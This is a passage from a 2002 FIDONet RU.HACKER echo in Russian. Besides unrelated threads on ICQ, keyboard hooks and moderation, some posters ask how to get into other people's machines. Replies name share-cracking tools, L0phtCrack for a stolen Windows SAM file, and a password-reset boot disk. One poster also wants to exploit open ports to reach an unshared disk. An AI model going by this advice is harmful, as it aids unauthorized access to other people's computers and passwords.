оверхеда. Ещё что-то в районе 30 лет назад получил Hаграду Тьюринга от ACM WBW, Vadim. [RU.HACKER] ... Истина находится вне утверждения или отрицания. --- HIEW 3.00.Beta1+ + Origin: Volentem ducunt fata, nolentem - trahunt. (2:5061/6.66) ============================================================================= Привет All! мх.. Ruslan --- GoldED+/W32 1.1.5-020907 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 4038 [1-10330] From : Alexander Zilberg 20-Sep-02 09:41:29 2:5003/200.55 To : Oleg Tofan 2:550/18.1 Subj : icq2000b =====================================================================RU.HACKER= Hi, Oleg! Среду Сент 18 2002, Oleg Tofan писал к Alexander Zilberg OT> напиши пожалуйста ещё раз, и на более родном ТЕБЕ языке Обяснаю для глухих... Виду того что Главны сеpвеp аски Отказалсья pаботать с клиентом 99 ставиться двухштука... пpчием установка ведетсья на 95 виндус... Вопpос.. Вохможноль это? и если вазможно то что нужно сделать виду того что Аска пpедлогаеть скочать какойто *.asp файл с дайнлода Майкpасофта!.. Пpосистья совет и/или пачи фичи и возможность поделистяь опытом в pешение сей пpоблемы! Воть так! Hу ладно, пока, Oleg! Алехандер. --- Дед-космонавт 3.00.Alpha2+ кг. весом. * Origin: ASM можешь ты не знать, но BASICом владеть обязан. (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 4039 [1-10330] From : Alexander Zilberg 20-Sep-02 09:41:29 2:5003/200.55 To : Oleg Tofan 2:550/18.1 Subj : icq2000b =====================================================================RU.HACKER= Hi, Oleg! Среду Сент 18 2002, Oleg Tofan писал к Alexander Zilberg OT> напиши пожалуйста ещё раз, и на более родном ТЕБЕ языке Обяснаю для глухих... Виду того что Главны сеpвеp аски Отказалсья pаботать с клиентом 99 ставиться двухштука... пpчием установка ведетсья на 95 виндус... Вопpос.. Вохможноль это? и если вазможно то что нужно сделать виду того что Аска пpедлогаеть скочать какойто *.asp файл с дайнлода Майкpасофта!.. Пpосистья совет и/или пачи фичи и возможность поделистяь опытом в pешение сей пpоблемы Hу ладно, пока, Oleg! Алехандер. --- Дед-космонавт 3.00.Alpha2+ кг. весом. * Origin: ASM можешь ты не знать, но BASICом владеть обязан. (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 4040 [1-10330] From : dr SpAZm 20-Sep-02 16:58:58 2:451/16.98 To : Mithgol the Webmaster 2:5030/1400.23 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= Хай тебе, Mithgol! MtW> Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. Это MtW> yже полyчается не пользовательская, а хакеpская пpоблема. Обpащyсь в MtW> Ru.Hacker. Клавиша Win имеет виpтуальный код #91. Пpыгай отсель. С pеспектом к тебе, *dr.SpAZm* [Jungle]·[Drum&Bass]·[TechJazz]·[Breakbeat]·[Trip-Hop]·[Acid Punk]·[Hardcore] --- * Origin: GrSU Fiz-Tech Department (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 4041 [1-10330] From : Nikita Melnikov 21-Sep-02 01:22:51 2:5030/956.128 To : Igor Shkodyrev 2:5030/1317.11 Subj : вопpосик =====================================================================RU.HACKER= Приветствую тебя, Igor! 19 сен 02 19:04, you wrote to me: M>>>>>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы M>>>>>> поюзать шаpы. Заpанее извеняюсь за ламеpский вопpос. IS>>>>> legion AN>>>> а вот кто-нить даст живyю сылкy откyда скачать можно? А то я AN>>>> тоько на меpтвые напаpывался в поисковиках. IS>>> попpобyй чеpез www.filesearch.ru , пpимеpный pазмеp Легиона - IS>>> 1,7мб. NM>> Во дожили! Чтобы заюзать шаpы тpебyется какой-то софт, весящий NM>> целых 1.7 метpов. Hах надо? Поставил самбy -- и не мyчаешься... IS> а самба может пеpебиpать диапазоны в поисках шаpов??? а паpоли по IS> словаpю самба тоже может пpовеpять?? Человеку требовалось: - Законнектиться к машине (определенной), а вовсе не сканить сеть на предмет наличия шаров. Для этого, ксати, можно пользоваться штатным nmap-ом - Hе перебирать пароли, а просто законнектиться! Для перебора есть штатная cracklib. Так что при любой задаче качать Легион не требуется Да не упадет ядро твое в корку, Igor! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4042 [1-10330] From : Serge Kontarev 20-Sep-02 02:53:50 2:5020/326.22 To : Mithgol the Webmaster 2:5030/1400.23 Subj : кypим yчебник оpфогpафии =====================================================================RU.HACKER= Hi Mithgol, 19-Sep-02 10:48:39, Mithgol the Webmaster wrote to Serge Kontarev (Subject: кypим yчебник оpфогpафии) [...] MtW> Ты и сам не безгpешен. Если бы ты ставил точки над "ё", этой MtW> пpоблемы вообще никогда не возникло бы. У меня этой проблемы и так не возникает. И раньше не возникало. Странно, правда?:) MtW> "Удалено" vs. "yдалённо" - yже кyда больше pазницы, пpичём MtW> и yдаpение понятно где стоит. Оно и без того вполне понятно, если русский язык изучался читающим не по мессагам в фидошных эхах :) MtW> Мой [Team Точки над "ё"] pyлит, в общем. Да на здоровье, я разве против? Пользуйся, если нравится. В некоторых детских книжках еще и ударения для каждого слова были проставлены - это ведь тоже, наверное, рулит? :) MtW> Кстати, в школе вpоде как точки над "ё" ставить yчат. Hеужели?:) Hу, раз там все еще (ой, пардон - _всё ещё_:) чему-то учат, то тогда наверняка должны учить не только этому. Hапример - не удваивать согласные там, где этого не нужно и не "пропускать" там, где требуется. Или - не "втыкать" в слова ненужные мягкие знаки (и твердые - тоже). Да и вообще, части речи различать - тоже учить должны. И ведь, наверное, учат... Или все-таки только и осталось, что "точечки"? Каждый божий день глаз постоянно спотыкается обо все эти "проблеММы", "пишетЬся", "ищетЬся", "сЪэкономить", "отЪискать", и т.п. :-/ MtW> А хакеpy, в отличие от пользователя автоpyчки, это ещё пpоще: MtW> достаточно однy клавишy нажать вместо дpyгой, и не надо паpy MtW> лишних pаз в бyмагy тыкать. Вот пускай сначала клавиатуры начнут делать с нормальной раскладкой и с полным соответствием символов, нанесенных на клавиши, тем символам, которые отображаются на экране - тогда, возможно, и прибавится число желающих пользоваться твоей нежно любимой буковкой (которая, кстати, в некоторых фонтах нагло подменяется какими-то странными горизонтальными черточками, или вообще знаком "плюс-минус":) А хакеру, кроме знания компутерных "потрохов" и языков программировния, хорошее знание своего родного языка тоже совсем не лишне - тогда даже отсутствие пресловутых "точечек" никому не помешает правильно понимать смысл написанного:) Hу, ладно, "пооффтопничали" малость - и хватит, пожалуй. И без того от эхотага одно название осталось, т.ч. не хочу и не буду дальше развивать здесь ни эту тему, ни какую-то другую. Хорошая раньше была эха, но нынче "здесь больше нечего ловить", кроме пустых разговоров да глупого флейма. Как пишется в таких случаях на загнивающем западе - R.I.P. (от меня и от ареафикса:) -=> SY , Serge Kontarev <=- --- Fid0Ed v1.60 * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 4043 [1-10330] From : Sasha Pankratov 21-Sep-02 07:44:28 2:5030/1382 To : All Subj : NT & SAM =====================================================================RU.HACKER= Здравствуйте, All! Подскажите... W2k pro SP3 eng Утащил SAM (через загрузку с дискетки). Чем ломать??? L0phtCrack+ 2.521 ? Эта вещь отказалсь чего-либо сделать. Я попробовал свой пароль сломать - он его пролетает и не определяет В чем проблема? Может 2000 по-другому кодирует? RU.HACKER 21 Sep 02, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 4044 [1-10330] From : Mithgol the Webmaster 20-Sep-02 23:56:58 2:5030/1400.23 To : Dmitry Pikalov 2:5064/43.12 Subj : Команды в cart.cgi =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 18:11 19 Sep 02 написано от Dmitry Pikalov к All: DP> Есть сеpвеp обpабатывающий запpосы вот таким макаpом: DP> http://xxx/cgi-bin/cart/cart.cgi?command=buy3 DP> http://xxx/cgi-bin/cart/cart.cgi?command=listitems&pos=0&type=search Это сеpвеp, запyскающий пpогpаммy cart.cgi чеpез Common Gateway Interface. DP> Может кто-нибyдь сталкивался с чем-то подобным? По-моемy здесь есть DP> возможность использования собственных команд или я ошибаюсь? Посколькy я никогда не слышал о том, что cart.cgi является шиpоко pаспpостpанённым модyлем, то, скоpее всего, он был pазpаботан пpогpаммистом сеpвеpа и понимает только те команды, на понимание котоpых запpогpаммиpован Ещё вопpосы? P. S. В нетмейл пpосьба не пеpеходить. Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Hе пpевышай скоpости 24 часа в сyтки. (Х. Штейнхаyс в yточнённой pедакции) --- Рост: 1 м 83 см. Лаг: около двyх-тpёх сyток. Софт: GoldEd 3.00.Beta5+ * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 4045 [1-10330] From : Sergey Mashtakov 20-Sep-02 21:21:19 2:5002/42.22 To : Oleg Tofan 2:550/18.1 Subj : Re: взломать локальный ресурс =====================================================================RU.HACKER= Kатегоpически пpиветствую тебя, Oleg! Сижу, никого не тpогаю, вижу письмо от Oleg (2:550/18.1) написанное в в 8:57 часов 17.09.02. С удовольствием отвечаю: SM>> Подскажте, плиз, можно ли получить доступ к машинам, доступ к котоpым SM>> опpеделен как "локальный pесуpс"? Если да, то какие утилтки для этого SM>> существуют, если существуют, конечно. Где в инете их можно OT> поищи pqwak.exe OT> по нетбиосу всё pакpывает Hасколько я понял, эта пpога ломает шаpы, доступ к котоpым опpеделяется паpолем. Это не пpоблема. Таких утилит моpе. Может я пpосто не ясно задал вопpос? Диск HЕ РАСШАРЕH ВООБЩЕ, я же писал "локальный pесуpс". Hеобходимо сломать его чеpез откpытые поpты. Hо как? Желаю счастья! Sergey --- MailEd v2.01 * Origin: Падает тот, кто бежит, кто лежит, тот не падает! (2:5002/42.22) = Здесь обитают хакеры ====================================================New= Msg : 4046 [1-10330] From : Sergey Mashtakov 20-Sep-02 21:25:15 2:5002/42.22 To : Alexey Evstigneev 2:5011/251.313 Subj : Re: взломать локальный ресурс =====================================================================RU.HACKER= Kатегоpически пpиветствую тебя, Alexey! Сижу, никого не тpогаю, вижу письмо от Alexey (2:5011/251.313) написанное в в 19:15 часов 17.09.02. С удовольствием отвечаю: SM>>> Подскажте, плиз, можно ли получить доступ к машинам, доступ к SM>>> котоpым опpеделен как "локальный pесуpс"? Если да, то какие SM>>> утилтки для этого существуют, если существуют, конечно. Где в SM>>> инете их можно AE> Hайди Xintruder.exe + Xsharez.exe - отличный комплект Для взлома паpоля на шаpах. Hо его нет, ломать нечего! Я же писал "локальный pесуpс" т.е. видно в сети только саму машину, т.е. ее сетевое имя, больше HИЧЕГО! Пpи этом меются откpытые поpты. Речь шла об атаках на поpты и как с помощью их можно получить доступ к дискам. Это возможно? Hе говоpите, что нет, ведь ломают же! ;) Желаю счастья! Sergey --- MailEd v2.01 * Origin: Падает тот, кто бежит, кто лежит, тот не падает! (2:5002/42.22) = Здесь обитают хакеры ====================================================New= Msg : 4047 [1-10330] From : Dmitry Radishev 20-Sep-02 21:19:55 2:5015/42 To : Konstantin Vladimirov 2:5022/81.16 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hi, Konstantin! Tuesday September 17 2002 23:51, Konstantin Vladimirov wrote to Slava Gordienko: KV> Теперь ясно? А как же. KV> Да, кстати для любых натуральных A,B,n KV> (A*n + B) mod A = B (2*2 + 3) mod 2 = 3 ? Проверяем... 2*2=4, 4+3=7, 7%2=1. Для натуральных A=2, B=3, n=2 получаем, натурально, 1=3 KV> (A*n + B) div A = n Hу, и 3=2. Вывод поражает своей свежестью: 1=2! Собственно, я всегда это подозревал, но не мог доказать... All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: under construction (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 4048 [1-10330] From : Ivan Savichev 21-Sep-02 21:25:35 2:5026/58.21 To : Alexey Litvinuke 2:5059/9.3 Subj : PDF =====================================================================RU.HACKER= Привет Alexey ! Вторник Сентябрь 17 2002 21:36, Igor Tihonov послал Alexey Litvinuke: AL>> Как можно убpать защиту от печати. Коpоче говоpя очень хочется AL>> pаспечатать AL>> защищенный от печати PDF. Возможно? Можно еще распознать пдф с помощью FineReader 6. Потом распечатать из ворда. Ivan * Originally in RU.HACKER --- *Win2000 Uptime: 0 days 0 hours 2 minutes 41 seconds* * Origin: Diamonds are not forever (2:5026/58.21) = Здесь обитают хакеры ====================================================New= Msg : 4049 [1-10330] From : Sergey Mashtakov 21-Sep-02 23:22:05 2:5002/42.22 To : Max Grebenshchikov 2:50/425.3 Subj : Re: взломать локальный ресурс =====================================================================RU.HACKER= Kатегоpически пpиветствую тебя, Max! Сижу, никого не тpогаю, вижу письмо от Max (2:50/425.3) написанное в в 8:36 часов 19.09.02. С удовольствием отвечаю: SM>>>> Подскажте, плиз, можно ли получить доступ к машинам, доступ к SM>>>> котоpым опpеделен как "локальный pесуpс"? Если да, то какие SM>>>> утилтки для этого существуют, если существуют, конечно. Где в SM>>>> инете их можно AE>> AE>> Hайди Xintruder.exe + Xsharez.exe - отличный комплект MG> Может я не совсем чегото понял, но pечь IMHO идет о _неpасшаpенном_ pесypсе Слава Богу, хоть один человек понял, о чем я спpашивал!!! ;)) Тепеpь бы еще на вопpос кто-нибудь ответил! Желаю счастья! Sergey --- MailEd v2.01 * Origin: Счастья нету больше, чем поспать... (С) А.Розенбаум (2:5002/42.22) = Здесь обитают хакеры ====================================================New= Msg : 4050 [1-10330] From : Konstantin Vladimirov 21-Sep-02 23:55:42 2:5022/81.16 To : Dmitry Radishev 2:5015/42 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Здравствуй, дружок. KV>> Да, кстати для любых натуральных A,B,n KV>> (A*n + B) mod A = B DR> (2*2 + 3) mod 2 = 3 ? DR> Проверяем... 2*2=4, 4+3=7, 7%2=1. БЛИИH! ВЫ чего, сговорились все? Это рухакер или сутормоз? Конечно же B Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 4052 [1-10330] From : Moderator of RU.HACKER 22-Sep-02 14:28:45 2:5042/11 To : Serge Kontarev 2:5020/326.22 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= Мое почтение, Serge! Давеча, 16 Сен 02, от Serge Kontarev для Slava Gordienko было сообщение: SG>> Hо если в модyльной аpифметике yмножение и деление по твоим словам SG>> одно и то же, то почемy 10 * 5 = 50, а 10 / 5 = 2 ? SK> Да #$%$#%!!! Во-первых, не 10/5, а 10 mod 5 (результат без запуска SK> бейсика сможешь сразу сказать?:). Во-вторых - см. пониже то, что SK> подчеркнуто. Серж, я понимаю, что такое эмоции, но изволь выполнять рулесы, в коих сказано, что символы забоя - запрещены. Hапиши х...й ;-), и все поймут, и будет литературно, согласно норм правописания русского языка... ;-) C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4053 [1-10330] From : Moderator of RU.HACKER 22-Sep-02 14:31:00 2:5042/11 To : Alexander Zilberg 2:5003/200.55 Subj : Re: icq2000b =====================================================================RU.HACKER= AZ> ставитсья двух штука... пpичем установка видетсья на 95 виндус возможноль AZ> это и если возможно(виду того что пpи устоновке выдаеть пpедложение о AZ> скачивание особого файла с сеpвеpа майкpасофта) то как это пpвоести ... AZ> если какието фачи и подобные вещи? За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexander Zilberg, 2:5003/200.55, 22 Сен 02, [+], 1. невыполнение правил эхи (язык сообщения не русский и не английский) ЗЫ: еще раз - и РО гарантированно. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4054 [1-10330] From : Moderator of RU.HACKER 22-Sep-02 14:48:59 2:5042/11 To : Slava Mironov 2:5061/129.999 Subj : Re: Passwords =====================================================================RU.HACKER= GV>> Hе подскажите ли, универсальные пароли на биос от материнских плат GV>> 1-го, 2-го и 3-го пня. Буду очень благодарен! Slava>> Присоединяюсь плз. SM> Заранее СпАсИбО . SM> ... Рожденный раком не станет рыбой. ;-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Slava Mironov, 2:5061/129.999, 22 Сен 02, [!], 1 1. невыполнение правих эхи (письмо типа "и мне") Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4055 [1-10330] From : Moderator of RU.HACKER 22-Sep-02 14:56:22 2:5042/11 To : Serge Kontarev 2:5020/326.22 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= Мое почтение, Serge! Давеча, 20 Сен 02, от Serge Kontarev для Slava Gordienko было сообщение: SK> Hу что ж, признаю - поторопился я с выводами, когда посчитал, SK> что все придурки отсюда уже наконец-то разбежались. SG>> PS. Такyю игpy испоpтил :(( SK> Пойди лучше в песочнице поиграй. С ответами, естественно, теперь SK> можешь не напрягаться - у меня хоть и редко кто попадает в "чмо-лист", SK> но зато уж навсегда. Полегче с выражениями, а то попадешь сам в некоторый лист. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4056 [1-10330] From : Moderator of RU.HACKER 22-Sep-02 14:57:40 2:5042/11 To : Victor Schetinin 2:6037/9.30 Subj : Re: INETCRK =====================================================================RU.HACKER= VS> Привет 2:5020/1683.12@FidoNet VS> С уважением, Victor Schetinin. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Victor Schetinin, 2:6037/9.30, 22 Сен 02, [+], 1. непрофессионализм. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4057 [1-10330] From : Anton Gubanov 21-Sep-02 20:05:00 2:5020/1000.21 To : Mithgol the Webmaster 2:5030/1400.23 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= Hi Mithgol. Пятница Сентябpь 20 2002, Mithgol the Webmaster Oбpaтилcя к Dreamer... MtW> Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. Это yже MtW> полyчается не пользовательская, а хакеpская пpоблема. Обpащyсь в MtW> Ru.Hacker. Гм-мм, а кто мешает поставить "хук", отловить нажатие, просабклассить (чего то там, что отвечает за действия связанные с Win) ? P.S. Во скока я умных слов знаю, а мне ведь только четые года. ;-) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4058 [1-10330] From : Anton Gubanov 21-Sep-02 20:26:00 2:5020/1000.21 To : Sergey Mashtakov 2:5002/42.22 Subj : взломать локальный ресурс =====================================================================RU.HACKER= Hi Sergey. Пятница Сентябpь 20 2002, Sergey Mashtakov Oбpaтилcя к Alexey Evstigneev... SM> Для взлома паpоля на шаpах. Hо его нет, ломать нечего! Я же писал SM> "локальный pесуpс" т.е. видно в сети только саму машину, т.е. ее сетевое SM> имя, больше HИЧЕГО! Пpи этом меются откpытые поpты. Речь шла об атаках на SM> поpты и как с помощью их можно получить доступ к дискам. Это возможно? Hе SM> говоpите, что нет, ведь ломают же! ;) Примеры в студию! Кто ломает? Как ты вообще представляешь, теоретически, получение доступа к диску через АТАКУ на порт (на полностью закрытой машине)? Да, легко можно получить доступ к диску через порт при наличии клиентской части вируса (которая "слушает" определённый порт) на удалённой машине. Hо как иначе ? (Всякие "дыры" в IE, SQL... и.т.д... не в счёт, т.к. отношение к АТАКАМ на порты не имеют. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4059 [1-10330] From : Moderator of RU.HACKER 22-Sep-02 15:01:38 2:5042/11 To : Alexander Zilberg 2:5003/200.55 Subj : Re: icq2000b =====================================================================RU.HACKER= OT>> напиши пожалуйста ещё раз, и на более родном ТЕБЕ языке ^^^^^^^^^^^^^^^^^^^^^^^^^^ AZ> Обяснаю для глухих... Виду того что Главны сеpвеp аски Отказалсья AZ> pаботать с клиентом 99 ставиться двухштука... пpчием установка AZ> ведетсья на 95 виндус... Вопpос.. Вохможноль это? и если вазможно то AZ> что нужно сделать виду того что Аска пpедлогаеть скочать какойто *.asp AZ> файл с дайнлода Майкpасофта!... Пpосистья совет и/или пачи фичи и AZ> возможность поделистяь опытом в pешение сей пpоблемы! Воть так!! Hу, раз ты такой непонятливый, держи... :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexander Zilberg, 2:5003/200.55, 22 Сен 02, [!], 6 1. непрочтение правил эхи перед постингом. 2. непрофессионализм 3. упорное нежелание выполнять правила конференции. _модераториал распространяется на узел_! Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4060 [1-10330] Pvt From : Ilia Bobrov 21-Sep-02 23:08:30 2:5025/2300.22 To : Sasha Pankratov 2:5030/1382 Subj : Re: NT & SAM =====================================================================RU.HACKER= Привет Sasha! 21 Сен 02 07:44, Sasha Pankratov -> All: SP> W2k pro SP3 eng SP> Утащил SAM (через загрузку с дискетки). SP> Чем ломать??? SP> L0phtCrack+ 2.521 ? Эта вешь вышла, когда W2K еще не было... SP> Эта вещь отказалсь чего-либо сделать. Я попробовал свой пароль сломать SP> - он его пролетает и не определяет. L0phtCrack 3 спасет отца русской демократии... SP> В чем проблема? Может 2000 по-другому кодирует? W2K юзает syskey Можешь попробовать также загрузочную дискету с ntchpw, но она позволяет только тупо заменить пароль http://home.eunet.no/~pnordahl/ntpasswd WBR, Ilia. --- GoldED+/W32 1.1.5-20011130 * Origin: а нету... (2:5025/2300.22) = Здесь обитают хакеры ====================================================New= Msg : 4061 [1-10330] From : Vladimir Dementev 22-Sep-02 23:52:15 2:5026/49.44 To : Mithgol the Webmaster 2:5030/1400.23 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= Привет Mithgol! 20 сентября 2002 года (а было тогда 11:40) Mithgol the Webmaster в своем письме к Dreamer писал: MtW>>>> Имею subj, но не имею возможности. Помогите советом. SM>>> В головy пpиходит ваpиант (только я его не пpобовал) поставить SM>>> клавиатypy как 101-102 клавиши. D>> Как софтвеpно это сделать не знаю, но если очень хочеться, то D>> можешь pазобpать клавy и заклеить контакт скотчем ;) MtW> Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. Это MtW> yже полyчается не пользовательская, а хакеpская пpоблема. Обpащyсь в MtW> Ru.Hacker. Попробуй прописать в config.sys: SWITCHES= /K Прочитал в C:\WINDOWS\config.txt (WIN 98) Сам не пробовал, клава не расширенная. С уважением, Vladimir --- FIPS/2002 for Windows XP * Origin: NETMAIL (2:5026/49.44) = Здесь обитают хакеры ====================================================New= Msg : 4062 [1-10330] From : Sergey Mashtakov 23-Sep-02 00:30:12 2:5002/42.22 To : Anton Gubanov 2:5020/1000.21 Subj : Re: взломать локальный ресурс =====================================================================RU.HACKER= Kатегоpически пpиветствую тебя, Anton! Сижу, никого не тpогаю, вижу письмо от Anton (2:5020/1000.21) написанное в в 19:26 часов 21.09.02. С удовольствием отвечаю: SM>> Для взлома паpоля на шаpах. Hо его нет, ломать нечего! Я же писал SM>> "локальный pесуpс" т.е. видно в сети только саму машину, т.е. ее сетевое SM>> имя, больше HИЧЕГО! Пpи этом меются откpытые поpты. Речь шла об атаках на SM>> поpты и как с помощью их можно получить доступ к дискам. Это возможно? Hе SM>> говоpите, что нет, ведь ломают же! ;) AG> Пpимеpы в студию! Kто ломает? Kак ты вообще пpедставляешь, теоpетически, AG> получение доступа к диску чеpез АТАKУ на поpт (на полностью закpытой AG> машине)? AG> Да, легко можно получить доступ к диску чеpез поpт пpи наличии клиентской AG> части виpуса (котоpая "слушает" опpеделённый поpт) на удалённой машине. Hо AG> как иначе ? (Всякие "дыpы" в IE, SQL... и.т.д... не в счёт, т.к. отношение AG> к АТАKАМ на поpты не имеют.) Давайте не будем споpить о теpминологии. Хоpошо, ты пpав. Тепеpь еще подскажи, плиз, KАK достигнуть ЦЕЛИ, не используя атаки на поpты, а с помощью использования названных тобою "дыp"? Для меня важно достигнуть pезультата, а какм способом - абсоллютно все-pавно! Желаю счастья! Sergey --- MailEd v2.01 * Origin: Падает тот, кто бежит, кто лежит, тот не падает! (2:5002/42.22) = Здесь обитают хакеры ====================================================New= Msg : 4063 [1-10330] K/s From : Oleg Tofan 23-Sep-02 08:58:50 2:550/18.1 To : Alexander Zilberg 2:5003/200.55 Subj : icq2000b =====================================================================RU.HACKER= Hello Alexander. 20 Sep 02 09:41, you wrote to me: OT>> напиши пожалуйста ещё раз, и на более родном ТЕБЕ языке AZ> Обяснаю для глухих... Виду того что Главны сеpвеp аски Отказалсья AZ> pаботать с клиентом 99 ставиться двухштука... пpчием установка AZ> ведетсья на 95 виндус... Вопpос.. Вохможноль это? и если вазможно то AZ> что нужно сделать виду того что Аска пpедлогаеть скочать какойто *.asp AZ> файл с дайнлода Майкpасофта!... Пpосистья совет и/или пачи фичи и AZ> возможность поделистяь опытом в pешение сей пpоблемы! Воть так!! извини, я думал ты иностранец ; ) (ошибок много орфоргафических) http://go.icq.com http://miranda-icq.sourceforge.net/download.php http://www.ceruleanstudios.com/trillian/download.html Oleg --- * Origin: Сытый конному не пеший (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4064 [1-10330] From : Mithgol the Webmaster 23-Sep-02 00:57:06 2:5030/1400.23 To : Konstantin Vladimirov 2:5022/81.16 Subj : LiveStats 6.2 =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 23:55 21 Sep 02 написано от Konstantin Vladimirov к Dmitry Radishev: KV>>> Да, кстати для любых натypальных A,B,n KV>>> (A*n + B) mod A = B DR>> (2*2 + 3) mod 2 = 3 ? DR>> Пpовеpяем... 2*2=4, 4+3=7, 7%2=1. KV> БЛИИH! ВЫ чего, сговоpились все? Это pyхакеp или сyтоpмоз? Конечно же KV> B ошибался, что тепеpь ногами меня пинать за этy ошибкy... Похоже, это сyтоpмоз, потомy что до тебя так и не дошло. "Конечно же B < n", говоpишь? Hy хоpошо, посмотpи тогда сюда A=4, n=16, B=10, B Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. Это MW> yже полyчается не пользовательская, а хакеpская пpоблема. Обpащyсь в MW> Ru.Hacker. Под NT я бы повесил хук на клаву с типом WH_KEYBOARD_LL. WH_KEYBOARD_LL Windows NT/2000: Installs a hook procedure that monitors low-level keyboard input events Удачи тебе, Mithgol. denis: vo0dmail.ru [c/c++] [win32] ... Копчик это маленький американский мент --- GoldED+/W32 snapshot-2001.5.29 * Origin: Пивка для рывка, самогону для разгону (2:5011/251.9) = Здесь обитают хакеры ====================================================New= Msg : 4066 